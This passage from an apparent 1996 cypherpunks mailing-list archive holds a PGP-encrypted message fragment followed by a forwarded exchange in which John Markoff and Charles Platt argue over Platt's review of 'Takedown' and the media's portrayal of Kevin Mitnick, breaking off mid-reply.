> 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
> XIpWrirDXI+90zyVAwhKtjbNlC2a
> =TKgw
> -----END PGP MESSAGE-----
> 
> ------------------------------------------------------------------------------
> Include everthing between the ------------------------------- and you will get
> the pictures in your mail box.
> 
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPayLeVevBgtmhnpAQGKxgL9H4WsKLnIJAXGm5s1XPwWkRKsTHj2Ewhm
sPVDYt697wflpqXy69oL4k8Jk/GUswuPcbO6/3zyeUGetm1hkVxrVCJSlW5sapQV
tIT2MSZi1uz3Wwfn52uajm0d7ebF9bx3
=yoZx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Jan 1996 00:49:43 +0800
To: cypherpunks@toad.com
Subject: Mitnick: Markoff responds to Platt's CuD "Takedown" critique
Message-ID: <gkxcLeG00YUq85__A3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Topic 1119 [media]:  Media Appearances of WELLperns VI, S.F.Bay Area Division
#160 of 296: john markoff (johnm)      Wed Dec 20 '95 (14:49)   557 lines

 
 
 
 
 
 
 Charles is certainly entitled to his opinion about our book, but I thought I
 would take this opportunity to correct his inaccuracies.
 
 
 
 
 
 
 
        REVIEW OF TAKEDOWN ON THE COMPUTER UNDERGROUND DIGEST
 
 
 
 
 
        The Mad-Scientist Myth Figure
 
 
 
        A circumlocuitous review of_Takedown_ by Tsutomu Shimomura and John
 Markoff
 
        (Hyperion, $24.95)
 
 
 
        by Charles Platt
 
 
 
 
 
 
 
  >           Perhaps it seems strange that a journalist should defend
 
        herself by pleading ignorance of the subject that she chose
 
        to write about. Still, we should give Katie Hafner credit
 
        where it is due: she now seems genuinely repentant.
 
 
 
 
 
        Just for the record, Katie says that her remarks were taken out of
 context here by Charles. For her actual views you might want to look at her
 Esquire article on the subject, which is reprinted in a new paperback
 version of Cyberpunk.
 
 
 
 
 
    >         The same can hardly be said for her ex-husband and ex-
 
        collaborator John Markoff, who must have made well over half
 
        a millions dollars by now, portraying Kevin Mitnick as an
 
        arch-enemy of techno-society. If Markoff regrets the
 
        "darkside hacker" label, he hasn't said much about it.
 
 
 
 
 
 
 
 
 
                            *         *         *
 
 
 
    >         Unlike many hackers, Kevin Mitnick never looked for
 
        publicity. He felt he should be paid for giving interviews,
 
        and when Hafner and Markoff refused to come up with any
 
        money, he refused to talk to them. He became famous--or
 
        infamous--while doing his best to remain obscure.
 
 
 
 
 
     The darkside hacker label was created during the late 1980s by the
 Southern California press. It is a label that I noted, but I didn't create.
 However, he's right I don't regret using it. And also for the record, Kevin
 Mitnick used to drive around in Las Vegas with a stack of copies of
 Cyberpunk in the trunk of his car to give away to admirers. He is on record
 as saying the book is "20 percent inaccurate."
 
 
 
 
 
 
 
   >          The key event that catalyzed this strange ascent to
 
        notoriety occurred on July 4th, 1994, when a story by John
 
        Markoff appeared on the front page of _The New York Times._
 
        Headlined "Cyberspace's Most Wanted: Hacker Eludes F.B.I.
 
        Pursuit," the text described Mitnick as "one of the nation's
 
        most wanted computer criminals" and was accompanied with a
 
        suitably menacing mug shot. The story was liberally spiced
 
        with tidbits recycled from _Cyberpunk,_ but if you looked
 
        more closely, there wasn't any actual news. Mitnick had
 
        violated parole a year or so previously, had disappeared at
 
        that time, and hadn't been seen since. That was all.
 
 
 
 
 
        This is really inaccurate. Kevin Mitnick had become notorious
 nationally in the late 1980s as a result of his being arrested for attacks
 on Digital Equipment Computers. A menacing mug shot? It was the only photo
 available. No actual news? Not the way I remember it. The news was that he
 was being pursued by the FBI (three agents full time), the California DMV,
 US Marshalls, telco security, local police, etc. The further news was that
 the FBI had told cellular telephone companies that they believed the
 fugitive had stolen software from at least six cellular phone manufacturers.
 I thought then, and still think, this merited a story. I also think the
 story was a good yarn. Mitnick had succeeded in evading law enforcement for
 more than a year - again.
 
 
 
 
 
 
 
             Why was this on the front page of a highly respected
 
        newspaper? Maybe because of the scary implications: that a
 
        weirdo who could paralyze vast computer networks was on the
 
        loose, and law enforcement had been too stupid to catch him.
 
             In reality, though, Mitnick has never been accused of
 
        willfully damaging any hardware or data, and has never been
 
 
 
 
 
        Wrong again. He was accused of doing more than $100,000 damage at US
 Leasing, a SF time sharing company in 1980. Their system was trashed by a
 group that Mitnick was a member of. After that, at various other times he
 cost companies tens of thousands of dollars trying to close the door on his
 attacks. A further point is that I have no control over placement of my
 stories in the paper.
 
 
 
 
 
 
 
             In _Cyberpunk,_ he was described as an omnipotent,
 
        obsessive-compulsive, egotistical, vindictive sociopath who
 
        used his computer to take revenge on the world that had
 
        spurned him. He later claimed (in _2600_ magazine) that this
 
 
 
     This is a totally misreading of Cyberpunk. I invite anyone to read that
 section of the book and see if that is the way he was portrayed.
 
 
 
 
 
 
 
        was "twenty percent fabricated and libelous." Maybe so, but
 
 
 
 
 
        I guess Kevin acknowledged 80 percent of what we wrote as accurate...
 8)
 
 
 
 
 
                 So far as I can discover, the FBI didn't classify
 
        Mitnick as one of America's most wanted; it was John Markoff
 
        who chose to apply that label. Markoff went far beyond the
 
        traditional function of a journalist who merely reports news;
 
        he helped to create a character, and the character himself
 
        became the news.
 
 
 
        Sorry, but I didn't create the character, Kevin did. He has now been
 arrested six times in fifteen years. Each time, except for this last time,
 he was given a second chance to get his act together. He chose not too. It
 seems to me that he is an adult and makes choices. He chose to keep breaking
 in to computers. He knew what the penalty was. So what's the problem?
 
 
 
 
 
             Unfortunately for Mitnick, this made him the target of a
 
        hacker witch hunt. A few years ago, here in CuD, Jim Thomas
 
 
 
        A witch hunt? Give me a break. It was an article describing a law
 enforcement hunt for a fugitive, who had been arrested five times
 previously, convicted at least three times, and was known to be attacking
 the computers of the nation's cellular telephone companies.
 
 
 
 
 
 
 
                            *         *         *
 
 
 
 
 
 
 
 
 
        This information probably wasn't worth much; Markoff told the
 
        feds that Mitnick could probably be found stuffing himself
 
        with junk food at the nearest Fatburger, whereas in fact
 
        Mitnick was working out regularly, had slimmed down to normal
 
        weight, and had become a vegetarian.
 
 
 
 
 
        Oh please. I was called by Kent Walker, the AUSA on the case during a
 meeting at the Well. He asked me if I thought Mitnick was dangerous. I
 responded that everything I knew about Mitnick had either been in Cyberpunk
 or my July 4 1994 article, ie. in the public. I repeated the story of one
 arrest in which Kevin ended up handcuffed in tears over the hood of the
 detective's car. I gave no other information, nor got any.
 
 
 
 
 
 
 
 
 
             John Markoff's precise motives remain a mystery. We can,
 
        however, learn something by examining his writing. In his
 
        _Times_ article describing Mitnick's capture, he stated that
 
        the hacker had been on a "long crime spree" during which he
 
        had managed to "vandalize government, corporate and
 
        university computer systems."
 
             These are interesting phrases. "Crime spree" suggests a
 
        wild cross-country caper involving robberies and maybe even a
 
        shoot-out. In reality, Mitnick seems to have spent most of
 
        his time hiding in an apartment, typing on a keyboard. The
 
        word "vandalize" implies that he wantonly wrecked some
 
        property; in reality, Mitnick caused no intentional damage to
 
        anyone or anything.
 
 
 
        This is just not true. Kevin Mitnick was actively sharing system
 vulnerabilities with other people on the net. That is about the most
 damaging thing that could be done to the Internet community.
 
 
 
 
 
 
 
             When it came down to it, Markoff's journalism was long
 
        on opinion and short on facts.
 
 
 
 
 
        Sort of like this review, I guess.....  8)
 
 
 
 
 
                            *         *         *
 
 
 
             I have a fantasy. In my fantasy, John Markoff bursts
 
        into a room where Tsutomu Shimomura sits as solemn as a zen
 
        master, peering impassively at a computer screen while he
 
        types a Perl script. "Tsutomu, I have good news and bad
 
        news!" Markoff exclaims. "The good news is, we sold the book
 
        rights for three-quarters of a million. The bad news is, I
 
        haven't got a clue what Mitnick was doing for the past two
 
        years. What the hell are we going to write about?"
 
             Shimomura doesn't even bother to look up. He gives a
 
        barely perceptible shrug and says, "Me, of course."
 
 
 
 
 
        This is weird...
 
 
 
 
 
 
 
 
 
 
 
 
 
             Mitnick grew up in a lower-class single-parent household
 
        and taught himself almost everything he knew about computers.
 
 
 
 
 
        Nice try. Kevin took lots of computer classes at various schools.
 
 
 
 
 
 
 
 
 
 
 
                            *         *         *
 
 
 
 
 
             Presumably because Markoff felt that some romantic
 
        interest would help to sell the story, this book contains
 
        revelations of a type normally reserved for Hollywood
 
        celebrities or British royalty. While he was pursuing
 
        Mitnick, Shimomura was also pursuing "Julia," the long-term
 
        girlfriend of John Gilmore, one of the first employees at Sun
 
        Microsystems in 1982 who subsequently co-founded the software
 
        corporation Cygnus.
 
 
 
 
 
   The reason we described what happened at Toad Hall on Xmas was that the
 attacks first came from toad.com while Tsutomu and Julia were there. If we
 hadn't have been complete in our description someone would have charged us
 with a cover up. Please remember that David Bank, a San Jose Mercury
 reporter, spent several weeks pursuing the hypothesis that Tsutomu had
 attack his own computers.
 
 
 
 
 
 
 
             Kevin Mitnick begins to seem likable by comparison. At
 
        least he shows some irreverence, taunting Shimomura and
 
        trying to puncture his pomposity. At one point, Mitnick
 
        bundles up all the data he copied from Shimomura's computer
 
        and saves it onto the system at Netcom where he knows that
 
        Shimomura will find it. He names the file "japboy." At
 
 
 
 
 
        Yea, That Kevin is a real likeable guy.
 
 
 
 
 
 
 
        another point, in a private online communication (intercepted
 
        by Shimomura without any lawful authorization) Mitnick
 
 
 
        Wrong. At the Well, Netcom and in Raleigh, Tsutomu, at all times was
 operating under the exemptions granted Internet Service Providers by the
 ECPA.
 
 
 
 
 
             Well, maybe so, but unlike Shimomura, Mitnick never
 
        claimed to be heroic. Nor did he cause any intentional
 
        "damage." Nor did he "attack," "pilfer," and "vandalize"
 
        computer systems, even though these words are used repeatedly
 
        throughout the book--in the same pejorative style that John
 
        Markoff previously perfected in _The New York Times._
 
 
 
        Perjorative?? Yikes! I mean we could go to the dictionary.....
 
 
 
 
 
 
 
 
 
                            *         *         *
 
 
 
             All the charges except one have been dropped against
 
        Kevin Mitnick. He may even be out of jail in time for the
 
        Markoff/Shimomura book tour. In other words, the man
 
 
 
 
 
        Wrong. Kevin Mitnick is in jail in Los Angeles facing charges from
 more than six United States Federal Districts. He may go on trial or he may
 plea bargain.
 
 
 
        described in advance publicity for _Takedown_ as a threat to
 
        global civilization will befree to go about his business--
 
        because, in the end, he wasn't much of a threat at all.
 
             Will this create an embarrassing schism between
 
        _Takedown_ and reality? Probably not. Reality has been at
 
        odds with the Mitnick myth for quite a while, but the myth is
 
        stronger than ever.
 
 
 
 
 
        Myth and reality? I have been writing about Kevin Mitnick for a long
 time, since 1981 to be precise, but I didn't create a myth, he created his
 own story.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Jan 1996 00:59:08 +0800
To: cypherpunks@toad.com
Subject: Mitnick #2: Platt responds to Markoff's rebuttal
Message-ID: <AkxcMg200YUqA5_=0A@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Topic 1119 [media]:  Media Appearances of WELLperns VI, S.F.Bay Area Division
#190 of 296: Declan McCullagh (declan)      Tue Jan  2 '96 (09:38)   212 lines
   <hidden>
 From cp@panix.com Tue Jan  2 09:26:11 1996
 Date: Tue, 2 Jan 1996 03:11:10 -0500 (EST)
 From: Charles Platt <cp@panix.com>
 To: Declan McCullagh
 Cc: Charles Platt <cp@panix.com>
 Subject: John Markoff's "rebuttal"
 
 
 In Computer Underground Digest I wrote a critical review of the recent
 book _Takedown_ by Shimomura and Markoff, in which I suggested that John
 Markoff had profited handsomely by mythologizing Kevin Mitnick as one of
 "America's most wanted computer criminals."
 
 My review was copied to The Well, where JM wrote a rebuttal. I am amused
 to fiund that this rebuttal not only fails to answer my rather serious
 allegations, but commits exactly the same journalistic sins of vagueness
 and hyperbole that I complained about originally. 
 
     JM writes: "Just for the record, Katie [Hafner] says that her remarks 
     were taken out of context here by Charles."
 
 This statement is perhaps intentionally vague, because if I don't know
 exactly what I'm being accused of, I can't answer it. *What,* precisely,
 was taken out of context? JM doesn't say. All I know is that when Katie
 Hafner contacted me directly, she complained that she never branded Kevin
 Mitnick a "darkside hacker" in the book _Cyberpunk;_ she merely used the
 phrase as the title of the first section of the book. But in fact, the
 "darkside hacker" term *is* applied to Mitnick within the text of the
 book; and in any case, a section heading obviously sets the tone for
 everything that follows. Therefore, I do not believe that I quoted Katie
 Hafner out of context--unless JM is talking about something else entirely,
 in which case he should say so, instead of attempting to devalue my review
 by a generalized accusation. 
 
     JM Writes: "The darkside hacker label was created during the late
     1980s by the Southern California press. It is a label that I noted,
     but I didn't create. However, he's right I don't regret using it. And
     also for the record, Kevin Mitnick used to drive around in Las Vegas
     with a stack of copies of Cyberpunk in the trunk of his car to give
     away to admirers.  He is on record as saying the book is '20 percent
     inaccurate.'" 
 
 JM is confusing the issue. I never suggested he invented the "darkside
 hacker" term. This is totally irrelevant. I said, very specifically, that
 he was the first to *apply* this label to Mitnick. JM does not actually 
 deny this, and I believe it is true.
 
     Re my description of his initial article about Mitnick for the NY
     Times, JM writes: "This is really inaccurate. Kevin Mitnick had become
     notorious nationally in the late 1980s as a result of his being
     arrested for attacks on Digital Equipment Computers. A menacing mug
     shot? It was the only photo available. No actual news? Not the way I
     remember it. The news was that he was being pursued by the FBI (three
     agents full time), the California DMV, US Marshalls, telco security,
     local police, etc. The further news was that the FBI had told cellular
     telephone companies that they believed the fugitive had stolen
     software from at least six cellular phone manufacturers. I thought
     then, and still think, this merited a story. I also think the story
     was a good yarn. Mitnick had succeeded in evading law enforcement for
     more than a year - again." 
 
 "Notorious" in what sense? This is another of those vague terms that JM
 throws around without limiting or defining it. Mitnick may have been
 "notorious" in hacker circles, but not in the eyes of the general public.
 My point was, and is, that JM converted Mitnick from a relatively obscure
 hacker into a public figure. JM tries to evade this point but cannot
 specifically deny it. As for Mitnick being "actively pursued," I believe
 this is a vast overstatement. As I understand it, law enforcement had
 largely lost interest until JM's news item embarrassed them. Even after
 that, according to JM's own book _Takedown,_ law enforcement had to be
 prodded into taking action. They seemed not to share JM's perception of 
 Mitnick as a severe threat. They certainly didn't characterize him as one 
 of "America's most wanted."
 
     In response to my statement that Kevin Mitnick has never been accused
     of intentionally damaging a computer, JM writes: "Wrong again. He was
     accused of doing more than $100,000 damage at US Leasing, a SF time
     sharing company in 1980. Their system was trashed by a group that
     Mitnick was a member of. After that, at various other times he cost
     companies tens of thousands of dollars trying to close the door on his
     attacks. A further point is that I have no control over placement of
     my stories in the paper." 
 
 With all due respect, this is not fair or accurate journalism. Was Mitnick
 *active* in the group that caused the alleged damage? Did he play a
 personal role? Does JM know? If not, he's just slinging mud. This is a
 smear and should not be presented as if it is a fact. On the other hand,
 if there is evidence that Mitnick was indeed actively responsible, I will
 gladly admit that I didn't know of this.
 
 As for the money that companies spent fixing the security weaknesses that 
 allowed Mitnick to gain access, it is grossly unfair and misleading for 
 JM to throw this into a paragraph discussing "intentional damage." This 
 is exactly the kind of deliberate blurring of different kinds of computer 
 misuse that I complained about in my review.
 
     Regarding Mitnick's "most wanted" status, JM writes:  "Sorry, but I
     didn't create the character, Kevin did. He has now been arrested six
     times in fifteen years. Each time, except for this last time, he was
     given a second chance to get his act together. He chose not too. It
     seems to me that he is an adult and makes choices. He chose to keep
     breaking in to computers. He knew what the penalty was. So what's the
     problem?" 
 
 Here again, JM avoids my direct point--that he was the first to categorize 
 Mitnick as "one of America's most wanted."
 
 Of course Mitnick is responsible for his actions. I never disputed this,
 and never suggested he was innocent of the crimes for which he was
 convicted. I merely suggested that the crimes were relatively trivial and
 were exaggerated out of all proportion by JM's extravagant prose.
 Exaggeration, imprecision, and innuendo: *that's* the problem, JM. 
 
     JM writes: "A witch hunt? Give me a break. It was an article
     describing a law enforcement hunt for a fugitive, who had been
     arrested five times previously, convicted at least three times, and
     was known to be attacking the computers of the nation's cellular
     telephone companies." 
 
 My review complained that JM throws around words such as "attack" without
 ever defining them in computer terms. He's still doing it here in his
 rebuttal. Kevin Mitnick never attacked any computer, by my understanding
 of the word. 
 
     Re providing advice to the police, JM writes: "I was called by Kent 
     Walker, the AUSA on the case during a meeting at the Well. He asked me
     if I thought Mitnick was dangerous. I responded that everything I knew
     about Mitnick had either been in Cyberpunk or my July 4 1994 article,
     ie. in the public. I repeated the story of one arrest in which Kevin 
     ended up handcuffed in tears over the hood of the detective's car. I
     gave no other information, nor got any." 
 
 Since we will never know the extent to which JM tried to help the FBI, I 
 guess we'll just have to take his word for this.
 
     Re Mitnick's dangerousness, JM writes: "This is just not true. Kevin
     Mitnick was actively sharing system vulnerabilities with other people
     on the net. That is about the most damaging thing that could be done
     to the Internet community." 
 
 Is JM aware that some highly respected security experts believe that
 sharing news of vulnerabilities is the best way to encourage better
 security?  True, this is a controversial subject; but certainly the
 sharing of vulnerabilities is NOT "the most damaging thing that could be
 done to the Internet community." That's just another of those wildly
 exaggerated phrases that JM throws out for emotional effect. I can think
 of many politicians--and even a few journalists--who pose a far greater
 danger to the future of the net than Kevin Mitnick ever did.
 
     Re the petty gossip in _Takedown,_ JM writes: "The reason we described
     what happened at Toad Hall on Xmas was that the attacks first came
     from toad.com while Tsutomu and Julia were there. If we hadn't have
     been complete in our description someone would have charged us with a
     cover up. Please remember that David Bank, a San Jose Mercury
     reporter, spent several weeks pursuing the hypothesis that Tsutomu had
     attack his own computers." 
 
 Uh-huh. And I suppose the rest of the sordid, relentlessly personal thread
 in _Takedown,_ describing every little nuance of Shimomura's campaign to
 steal someone's long-term girlfriend, was merely included so that no one
 could complain that the account was incomplete? Really! 
 
     In my review, I complained about pejorative terms (such as "attack")
     that JM uses repeatedly. His response: "Perjorative?? Yikes! I mean we
     could go to the dictionary....." 
 
 Well, I guess JM *should* go to the dictionary. If he does, he will find
 that pejorative is a perfectly good word which I spelled correctly. It's
 ironic that he seems unaware of it, since it so aptly describes his
 own journalistic technique. 
 
     Re my assertion that all charges but one against Mitnick have been
     dropped, JM replies: "Wrong. Kevin Mitnick is in jail in Los Angeles
     facing charges from more than six United States Federal Districts. He
     may go on trial or he may plea bargain." 
 
 I tried to contact Mitnick's attorney before I wrote my review. He did 
 not return my calls. I based my statement on information from three other 
 sources. If it's incorrect, obviously I stand corrected. As I understand 
 it, though, those charges from other federal districts may not have been 
 actually filed. Is "facing charges" another of those slightly misleading 
 terms that makes the situation sound worse than it really is? Are the 
 charges actual, or potential?
 
     Finally JM writes: "Myth and reality? I have been writing about Kevin
     Mitnick for a long time, since 1981 to be precise, but I didn't create
     a myth, he created his own story." 
 
 In his own rebuttal, JM has already referred to the Mitnick story as a
 "good yarn." A yarn, of course, is a richly embroidered, sometimes
 fictionalized version of the truth. This is precisely what I believe he
 concocted, and it isn't my idea of decent journalism.
 
 ----
 
 Lastly, a question which occurred to me after I wrote my original review.
 Around the same time that Kevin Mitnick broke into Tsutomo Shimomura's
 computer, he also broke into the system of Dan Farmer, another extremely
 well known security expert. What did Farmer do? He didn't get
 self-righteous about the "invasion of privacy." He didn't start ranting
 about the "extreme danger" posed by Mitnick. He certainly didn't take
 several weeks from his normal schedule and pursue a personal vendetta. Nor
 did he coauthor a book portraying Mitnick as a danger to the net. He 
 presumably fixed the flaw that had allowed Mitnick to get in, and went on 
 with his life.
 
 Would JM like to explain how Dan Farmer's perception of "the Mitnick
 threat" can be so different from Shimomura's? To the outside observer, it
 almost looks as if there wasn't a significant security threat, and
 Shimomura must have been motivated by wounded vanity, while John Markoff
 was motivated by his desire to tell a "good yarn" and make a lot of money.
 Am I wrong? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 13 Jan 1996 03:01:45 +0800
To: cypherpunks@toad.com
Subject: Mitnick #3: Markoff responds again to Platt
Message-ID: <kkxcNda00YUqE5_=gs@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Topic 1119 [media]:  Media Appearances of WELLperns VI, S.F.Bay Area Division
#212 of 296: john markoff (johnm)      Wed Jan  3 '96 (16:58)   256 lines
   <hidden>
 
 
 My response to Charles Platt's rebuttal.....
 
 
 
 
 
      JM Writes: "The darkside hacker label was created during the late
      1980s by the Southern California press. It is a label that I noted,
      but I didn't create. However, he's right I don't regret using it. And
      also for the record, Kevin Mitnick used to drive around in Las Vegas
      with a stack of copies of Cyberpunk in the trunk of his car to give
      away to admirers.  He is on record as saying the book is '20 percent
      inaccurate.'"
 
  >JM is confusing the issue. I never suggested he invented the "darkside
  >hacker" term. This is totally irrelevant. I said, very specifically, that
  >he was the first to *apply* this label to Mitnick. JM does not actually
  >deny this, and I believe it is true.
 
 Sorry, you're wrong. The "darkside hacker" label was used in the headlines
 of Southern California press coverage of Mitnick in 1987-8, in particular by
 John Johnson, an LA Times metro reporter. I was not the first one to use the
 term with respect to Mitnick.
 
 
 
      Re my description of his initial article about Mitnick for the NY
      Times, JM writes: "This is really inaccurate. Kevin Mitnick had become
      notorious nationally in the late 1980s as a result of his being
      arrested for attacks on Digital Equipment Computers. A menacing mug
      shot? It was the only photo available. No actual news? Not the way I
      remember it. The news was that he was being pursued by the FBI (three
      agents full time), the California DMV, US Marshalls, telco security,
      local police, etc. The further news was that the FBI had told cellular
      telephone companies that they believed the fugitive had stolen
      software from at least six cellular phone manufacturers. I thought
      then, and still think, this merited a story. I also think the story
      was a good yarn. Mitnick had succeeded in evading law enforcement for
      more than a year - again."
 
  >"Notorious" in what sense? This is another of those vague terms that JM
  >throws around without limiting or defining it. Mitnick may have been
  >"notorious" in hacker circles, but not in the eyes of the general public.
  >My point was, and is, that JM converted Mitnick from a relatively obscure
  >hacker into a public figure. JM tries to evade this point but cannot
  >specifically deny it. As for Mitnick being "actively pursued," I believe
  >this is a vast overstatement. As I understand it, law enforcement had
  >largely lost interest until JM's news item embarrassed them. Even after
